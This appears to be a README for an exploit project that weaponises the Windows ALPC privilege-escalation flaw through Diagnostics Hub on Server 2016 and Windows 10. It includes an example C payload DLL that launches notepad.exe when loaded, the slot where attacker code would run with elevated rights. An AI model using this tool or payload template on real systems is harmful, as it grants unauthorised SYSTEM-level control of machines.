alpc-diaghub

Utilizing the ALPC flaw in combination with Diagnostics Hub, as found in Server 2016 and Windows 10.

Primary Language: C

About

This project seeks to provide a stable, reliable method for the ALPC exploit originally disclosed by SandboxEscaper.

It attempts to clean up after itself once the DLL has been loaded.

Screenshots:

Example Payload:

```c
#include <windows.h>

// Example payload: a minimal DLL whose only action is to launch notepad.exe
// when the DLL is first mapped into the process (DLL_PROCESS_ATTACH).
BOOL WINAPI DllMain(HINSTANCE hinstDll, DWORD dwReason, LPVOID lpReserved)
{
        switch(dwReason)
        {
                case DLL_PROCESS_ATTACH:
                        // Runs once, when the DLL is loaded into the process.
                        WinExec("C:\\Windows\\System32\\notepad.exe", 0);
                        break;
                case DLL_PROCESS_DETACH:
                        break;
                case DLL_THREAD_ATTACH:
                        break;
                case DLL_THREAD_DETACH:
                        break;
        }

        // DllMain must return TRUE for DLL_PROCESS_ATTACH; returning FALSE (0)
        // makes the loader unload the DLL and report the load as failed.
        return TRUE;
}
```